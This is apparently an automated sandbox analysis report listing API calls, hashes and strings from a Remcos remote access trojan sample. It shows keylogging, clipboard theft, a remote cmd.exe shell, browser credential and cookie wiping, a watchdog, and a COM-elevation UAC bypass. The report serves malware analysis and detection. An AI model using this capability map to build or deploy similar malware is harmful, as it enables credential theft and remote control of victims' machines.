                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 614378929-0
                                                                                                        • Opcode ID: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                                                                        • Instruction ID: 91765bf56145836b352927287b0900a7be963fc320189fecf9c5ab0789588b10
                                                                                                        • Opcode Fuzzy Hash: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                                                                        • Instruction Fuzzy Hash: 2D01DB771043056BF321CF66984595AFBD9FB8A370F65051EE59453280EB34A806C778
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(00000008,0000000A,00000000,?,00446F74,00000001,00000364,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000,?), ref: 00448747
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        APIs
                                                                                                        • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Startup
                                                                                                        • String ID:
                                                                                                        • API String ID: 724789610-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: send
                                                                                                        • String ID:
                                                                                                        • API String ID: 2809346765-0
                                                                                                        APIs
                                                                                                        • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                          • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                          • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                          • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                          • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                          • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                          • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                          • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                          • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                          • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                          • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                          • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                          • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                          • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                          • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                        • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                          • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                        • API String ID: 2918587301-599666313
                                                                                                        APIs
                                                                                                        • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                          • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                          • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                        • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                        • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                          • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                          • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                          • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                        • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                        • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                        • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                        • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                        • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                        • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                        • API String ID: 3815868655-81343324
                                                                                                        APIs
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                          • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                          • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                          • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                        • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                        • API String ID: 65172268-860466531
                                                                                                        APIs
                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                        • API String ID: 1164774033-3681987949
                                                                                                        APIs
                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$Close$File$FirstNext
                                                                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                        • API String ID: 3527384056-432212279
                                                                                                        • Opcode ID: ca4c0e5d84f7cb7ee38c8e3133793af3c270269af9d1d2af5c27a16806cbf6ef
                                                                                                        • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                        • Opcode Fuzzy Hash: ca4c0e5d84f7cb7ee38c8e3133793af3c270269af9d1d2af5c27a16806cbf6ef
                                                                                                        • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                        • API String ID: 726551946-3025026198
                                                                                                        • Opcode ID: fc54411cfe1b16664af1a362ddb9d5f33de03dcc47f8e28b32825c15ab13c746
                                                                                                        • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                        • Opcode Fuzzy Hash: fc54411cfe1b16664af1a362ddb9d5f33de03dcc47f8e28b32825c15ab13c746
                                                                                                        • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                        APIs
                                                                                                        • OpenClipboard.USER32 ref: 004159C7
                                                                                                        • EmptyClipboard.USER32 ref: 004159D5
                                                                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                        • CloseClipboard.USER32 ref: 00415A5A
                                                                                                        • OpenClipboard.USER32 ref: 00415A61
                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                        • CloseClipboard.USER32 ref: 00415A89
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3520204547-0
                                                                                                        • Opcode ID: 92ff16621bb008ec349cac96769bc2e22541bc6f21a77906abd6e904815f1c10
                                                                                                        • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                        • Opcode Fuzzy Hash: 92ff16621bb008ec349cac96769bc2e22541bc6f21a77906abd6e904815f1c10
                                                                                                        • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0$1$2$3$4$5$6$7
                                                                                                        • API String ID: 0-3177665633
                                                                                                        • Opcode ID: ecb5ab5c14ee3ab28359405d5e5b6cf7107a78e006011c639a5add2d2d09b49f
                                                                                                        • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                        • Opcode Fuzzy Hash: ecb5ab5c14ee3ab28359405d5e5b6cf7107a78e006011c639a5add2d2d09b49f
                                                                                                        • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                        APIs
                                                                                                        • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                        • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                        • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                        • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                        • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                        • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                        • String ID: 8[G
                                                                                                        • API String ID: 1888522110-1691237782
                                                                                                        • Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                        • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                        • Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                        • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                        APIs
                                                                                                        • _wcslen.LIBCMT ref: 00406788
                                                                                                        • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Object_wcslen
                                                                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                        • API String ID: 240030777-3166923314
                                                                                                        • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                        • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                        • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                        • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                        APIs
                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                        • GetLastError.KERNEL32 ref: 00419935
                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3587775597-0
                                                                                                        • Opcode ID: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                        • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                        • Opcode Fuzzy Hash: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                        • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                        • String ID: <D$<D$<D
                                                                                                        • API String ID: 745075371-3495170934
                                                                                                        • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                        • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                        • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                        • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                                          • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 2341273852-0
                                                                                                        • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                        • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                        • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                        • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                          • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Find$CreateFirstNext
                                                                                                        • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                        • API String ID: 341183262-3780268858
                                                                                                        • Opcode ID: 1d006b57ec8407d67f410f90ba5cffff3744a2d4bd6339dc38e1b966420dba2d
                                                                                                        • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                        • Opcode Fuzzy Hash: 1d006b57ec8407d67f410f90ba5cffff3744a2d4bd6339dc38e1b966420dba2d
